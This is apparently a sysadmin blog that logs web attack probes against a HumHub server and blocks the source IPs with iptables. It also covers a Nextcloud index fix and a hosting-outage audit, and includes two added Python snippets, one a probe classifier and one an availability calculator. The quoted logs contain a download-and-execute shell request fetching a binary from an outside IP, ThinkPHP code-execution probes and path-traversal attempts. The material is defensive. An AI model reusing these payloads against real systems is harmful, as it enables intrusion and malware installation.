Attack from IP 45.9.20.101 (Amsterdam)

Here are all the attempts:

45.9.20.101 - - [11/May/2022:09:56:44 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:09:56:45 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80/Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:47 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:48 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /console/ HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:06 +0200] "GET / HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:08 +0200] "GET /user/auth/login HTTP/1.1" 200 13468 "https://80.15.48.50:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /user/auth/login HTTP/1.1" 200 8272 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:19 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?a=fetch&content=die(@md5(HelloThinkCMF))" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:21 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:24 +0200] "GET /user/auth/login HTTP/1.1" 200 13465 "https://80.15.48.50:443/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

Apparently this is not the first time:

# grep "45.9.20.101" /var/log/apache2/access.humhub.log* | wc -l
65

A tip:

iptables -A INPUT -s 45.9.20.101 -j DROP
/usr/sbin/iptables-save > /etc/iptables/rules.v4

NEXTCLOUD: Index problem

I had the following error:

La base de données a quelques index manquants. L’ajout d’index dans de grandes tables peut prendre un certain temps. Elles ne sont donc pas ajoutées automatiquement. En exécutant « occ db:add-missing-indices », ces index manquants pourront être ajoutés manuellement pendant que l’instance continue de tourner. Une fois les index ajoutés, les requêtes sur ces tables sont généralement beaucoup plus rapides.

-Index « fs_id_storage_size » manquant dans la table « oc_filecache ».
-Index « fs_storage_path_prefix » manquant dans la table « oc_filecache ».
-Index « properties_pathonly_index » manquant dans la table « oc_properties ».
-Index « job_lastcheck_reserved » manquant dans la table « oc_jobs ».

I have a hard time understanding why the indexes are not created automatically:

$ sudo -u www-data php8.0 /usr/share/nginx/nextcloud/occ db:add-missing-indice
Check indices of the share table.
Check indices of the filecache table.
Adding additional size index to the filecache table, this can take some time...
Filecache table updated successfully.
Adding additional path index to the filecache table, this can take some time...
Filecache table updated successfully.
Check indices of the twofactor_providers table.
Check indices of the login_flow_v2 table.
Check indices of the whats_new table.
Check indices of the cards table.
Check indices of the cards_properties table.
Check indices of the calendarobjects_props table.
Check indices of the schedulingobjects table.
Check indices of the oc_properties table.
Adding properties_pathonly_index index to the oc_properties table, this can take some time...
oc_properties table updated successfully.
Check indices of the oc_jobs table.
Adding job_lastcheck_reserved index to the oc_jobs table, this can take some time...
oc_properties table updated successfully.

The problem is now fixed.

List of blocked IPs

So I blocked the following IPs:

42.193.42.236 - - [11/May/2022:10:13:54 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
47.106.177.157 - - [11/May/2022:08:13:31 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBB.arm;+chmod+777+NW_BBB.arm;+./NW_BBB.arm Jaws.Selfrep;rm+-rf+NW_BBB.arm" 400 0 "-" "-"
31.44.185.235 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "Mozilla/5.0 zgrab/0.x"
80.94.93.125 - - [11/May/2022:02:14:23 +0200] "POST /mgmt/tm/util/bash HTTP/1.1\n" 400 0 "-" "-"
164.92.236.186 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"

The largest number came from this IP:

IP Address: 42.193.42.236
Country: China
Region: Beijing
City: Beijing
ISP: Tencent Cloud Computing (Beijing) Co. Ltd.
Organization: Not Available
Latitude: 39.9075
Longitude: 116.3972

The blocking:

#  iptables -A INPUT -s 42.193.42.236 -j DROP
#  iptables -A INPUT -s 47.106.177.157 -j DROP
#  iptables -A INPUT -s 31.44.185.235 -j DROP
#  iptables -A INPUT -s 80.94.93.125 -j DROP
#  iptables -A INPUT -s 164.92.236.186 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4
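
Added example (not from the original post): a small classifier for the probe types visible in the two log excerpts above (the 45.9.20.101 attempts and the blocked-IP list). It matches only the request field, so the redirected /user/auth/login hits that carry the probe in the Referer are not counted twice. The signature names, the `min_distinct` threshold and the sample lines (documentation IP ranges) are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Combined Log Format: ip ident user [time] "request" status size "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" \d{3} \S+')

# Probe signatures derived from the requests quoted on this page (names are ours).
SIGNATURES = {
    "exchange-autodiscover": re.compile(r"/Autodiscover/Autodiscover\.xml", re.I),
    "xdebug-session": re.compile(r"XDEBUG_SESSION_START="),
    "thinkphp-invokefunction": re.compile(r"invokefunction&function=call_user_func_array"),
    "thinkcmf-fetch": re.compile(r"a=fetch&content="),
    "spring-gateway-actuator": re.compile(r"/actuator/gateway/routes"),
    "solr-admin-info": re.compile(r"/solr/admin/info/system"),
    "f5-mgmt-bash": re.compile(r"/mgmt/tm/util/bash"),
    "path-traversal": re.compile(r"(?:\.\./){2,}"),
    "tls-on-http-port": re.compile(r"^\\x16\\x03"),  # TLS ClientHello sent to a plain HTTP port
}

def classify(log_text):
    """Return {ip: Counter(signature -> hits)} for requests matching a probe signature."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, request = m.groups()
        for name, pattern in SIGNATURES.items():
            if pattern.search(request):
                hits[ip][name] += 1
    return hits

def block_candidates(log_text, min_distinct=2):
    """IPs that tried at least `min_distinct` different probe types (assumed threshold)."""
    return sorted(ip for ip, c in classify(log_text).items() if len(c) >= min_distinct)

# Constructed sample in the page's log format; IPs are from documentation ranges.
SAMPLE = r'''203.0.113.10 - - [11/May/2022:11:09:47 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 400 "-" "Mozilla/5.0"
203.0.113.10 - - [11/May/2022:11:09:48 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://192.0.2.1:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0"
203.0.113.10 - - [11/May/2022:14:38:52 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 400 "-" "Mozilla/5.0"
198.51.100.7 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"
198.51.100.9 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "zgrab"
192.0.2.44 - - [11/May/2022:08:00:00 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "-" "Mozilla/5.0"'''

if __name__ == "__main__":
    print(block_candidates(SAMPLE))
```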

NUXIT: Calculating the SLA for CYBERNEURONES at NUXIT

I think there is a loss of quality in NUXIT's service! My plan is Performance 1 at 10.80 euros/month.

Here are all the outages over one year at https://www.nuxit.com/:

  • 28/04/2022, 19:28 : It appeared offline or unresponsive for approximately 26 mins.
  • 28/04/2022, 07:51 : It appeared offline or unresponsive for approximately 12 mins.
  • 25/03/2022, 02:01 : It appeared offline or unresponsive for approximately 5 mins.
  • 23/03/2022, 13:12 : It appeared offline or unresponsive for approximately 5 mins.
  • 17/03/2022, 17:22 : It appeared offline or unresponsive for approximately 20 mins.
  • 16/03/2022, 21:51 : It appeared offline or unresponsive for approximately 10 mins.
  • 16/03/2022, 03:14 : It appeared offline or unresponsive for approximately 52 mins.
  • 15/03/2022, 23:51 : It appeared offline or unresponsive for approximately 5 mins.
  • 01/03/2022, 01:03 : It appeared offline or unresponsive for approximately 5 mins.
  • 18/02/2022, 02:10 : It appeared offline or unresponsive for approximately 14 mins.
  • 11/02/2022, 11:31 : It appeared offline or unresponsive for approximately 10 mins.
  • 08/02/2022, 01:15 : It appeared offline or unresponsive for approximately 20 mins.
  • 05/02/2022, 12:28 : It appeared offline or unresponsive for approximately 10 mins.
  • 26/01/2022, 21:02 : It appeared offline or unresponsive for approximately 4 mins.
  • 26/01/2022, 20:14 : It appeared offline or unresponsive for approximately 10 mins.
  • 16/01/2022, 07:44 : It appeared offline or unresponsive for approximately 12 mins.
  • 14/01/2022, 13:48 : It appeared offline or unresponsive for approximately 20 mins.
  • 09/01/2022, 03:52 : It appeared offline or unresponsive for approximately 3 hours.
  • 07/01/2022, 05:44 : It appeared offline or unresponsive for approximately 3 hours.
  • 22/12/2021, 20:31 : It appeared offline or unresponsive for approximately 6 mins.
  • 16/11/2021, 11:57 : It appeared offline or unresponsive for approximately 5 mins.
  • 11/11/2021, 11:45 : It appeared offline or unresponsive for approximately 5 mins.
  • 11/11/2021, 02:44 : It appeared offline or unresponsive for approximately 44 mins.
  • 07/11/2021, 17:43 : It appeared offline or unresponsive for approximately 28 mins.
  • 07/11/2021, 16:02 : It appeared offline or unresponsive for approximately 4 mins.
  • 25/10/2021, 13:32 : It appeared offline or unresponsive for approximately 5 mins.
  • 24/10/2021, 17:48 : It appeared offline or unresponsive for approximately 40 mins.
  • 22/10/2021, 17:13 : It appeared offline or unresponsive for approximately 28 mins.
  • 05/10/2021, 12:48 : It appeared offline or unresponsive for approximately 4 mins.
  • 29/09/2021, 10:27 : It appeared offline or unresponsive for approximately 10 mins.
  • 28/09/2021, 15:42 : It appeared offline or unresponsive for approximately 5 mins.
  • 14/09/2021, 13:48 : It appeared offline or unresponsive for approximately 5 mins.
  • 11/09/2021, 17:29 : It appeared offline or unresponsive for approximately 10 mins.
  • 05/09/2021, 11:06 : It appeared offline or unresponsive for approximately 12 mins.
  • 19/08/2021, 23:00 : It appeared offline or unresponsive for approximately 6 mins.
  • 19/08/2021, 03:51 : It appeared offline or unresponsive for approximately 12 mins.
  • 14/08/2021, 10:41 : It appeared offline or unresponsive for approximately 10 mins.
  • 11/08/2021, 20:29 : It appeared offline or unresponsive for approximately 28 mins.
  • 11/08/2021, 19:17 : It appeared offline or unresponsive for approximately 10 mins.
  • 08/08/2021, 08:54 : It appeared offline or unresponsive for approximately 11 mins.
  • 29/07/2021, 17:08 : It appeared offline or unresponsive for approximately 5 mins.
  • 20/07/2021, 15:14 : It appeared offline or unresponsive for approximately 23 mins.
  • 13/07/2021, 17:13 : It appeared offline or unresponsive for approximately 4 mins.
  • 26/06/2021, 10:06 : It appeared offline or unresponsive for approximately 3 hours.
  • 24/06/2021, 12:48 : It appeared offline or unresponsive for approximately 6 mins.
  • 15/06/2021, 03:32 : It appeared offline or unresponsive for approximately 4 mins.
  • 02/06/2021, 03:36 : It appeared offline or unresponsive for approximately 14 mins.
  • 27/05/2021, 15:14 : It appeared offline or unresponsive for approximately 38 mins.
  • 20/05/2021, 07:50 : It appeared offline or unresponsive for approximately 12 mins.
  • 19/05/2021, 18:23 : It appeared offline or unresponsive for approximately 6 mins.
  • 18/05/2021, 09:55 : It appeared offline or unresponsive for approximately 5 mins.
  • 18/05/2021, 09:13 : It appeared offline or unresponsive for approximately 5 mins.
  • 18/05/2021, 08:40 : It appeared offline or unresponsive for approximately 14 mins.
  • 17/05/2021, 16:29 : It appeared offline or unresponsive for approximately 14 mins.
  • 17/05/2021, 09:20 : It appeared offline or unresponsive for approximately 22 mins.
  • 17/05/2021, 08:46 : It appeared offline or unresponsive for approximately 29 mins.
  • 07/05/2021, 04:27 : It appeared offline or unresponsive for approximately 5 mins.
  • 24/03/2021, 02:57 : It appeared offline or unresponsive for approximately 10 mins.

I have many more outages than in the last audit: 58 outages, 3 of them lasting 3 hours.

My previous audit: 14 outages:

  • 20/03/2021 at 08:42 : It was down for approximately 2 hours.
  • 26/02/2021 at 18:06 : It was down for approximately 51 mins.
  • 08/01/2021 at 23:02 : It was down for approximately 1 hour.
  • 20/12/2020 at 10:16 : It was down for approximately 12 mins.
  • 02/12/2020 at 21:27 : It was down for approximately 25 mins.
  • 02/12/2020 at 20:25 : It was down for approximately 5 mins.
  • 08/10/2020 at 09:47 : It was down for approximately 5 mins.
  • 11/08/2020 at 09:24 : It was down for approximately 6 mins.
  • 04/08/2020 at 17:14 : It was down for approximately 5 mins.
  • 08/07/2020 at 18:11 : It was down for approximately 6 mins.
  • 25/06/2020 at 15:01 : It was down for approximately 52 mins.
  • 25/04/2020 at 17:43 : It was down for approximately 11 mins.
  • 01/04/2020 at 16:38 : It was down for approximately 29 mins.
  • 25/03/2020 at 14:30 : It was down for approximately 3 hours.

JetPack waits 5 minutes, so I don't get outages shorter than 5 minutes.
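
Added example (not from the original post): one way to turn outage lists in the two phrasings used above into a total downtime and an availability figure. The function names, the 365-day period and the four sample entries are constructed assumptions; paste the full list into `report` to get the figure for a whole audit.

```python
import re

# Matches both phrasings used in the lists on this page:
#   "... It appeared offline or unresponsive for approximately 26 mins."
#   "... It was down for approximately 2 hours."
OUTAGE = re.compile(r"for approximately (\d+) (min|hour)", re.I)

def downtime_minutes(report):
    """Return (total reported downtime in minutes, number of outages)."""
    total = count = 0
    for line in report.splitlines():
        m = OUTAGE.search(line)
        if m:
            value, unit = int(m.group(1)), m.group(2).lower()
            total += value * (60 if unit == "hour" else 1)
            count += 1
    return total, count

def availability(report, period_days=365):
    """Availability in percent over the period, based on reported outages only.

    Outages shorter than the monitor's 5-minute delay are never reported,
    so the real availability can only be lower than this figure.
    """
    total, _ = downtime_minutes(report)
    return 100.0 * (1 - total / (period_days * 24 * 60))

# Constructed sample using the page's two phrasings (not the full list).
SAMPLE = """\
28/04/2022, 19:28 : It appeared offline or unresponsive for approximately 26 mins.
09/01/2022, 03:52 : It appeared offline or unresponsive for approximately 3 hours.
02/06/2021, 03:36 : It appeared offline or unresponsive for approximately 14 min.
08/01/2021, 23:02 : It was down for approximately 1 hour.
"""

if __name__ == "__main__":
    minutes, outages = downtime_minutes(SAMPLE)
    print(f"{outages} outages, {minutes} min down, {availability(SAMPLE):.4f}% available")
```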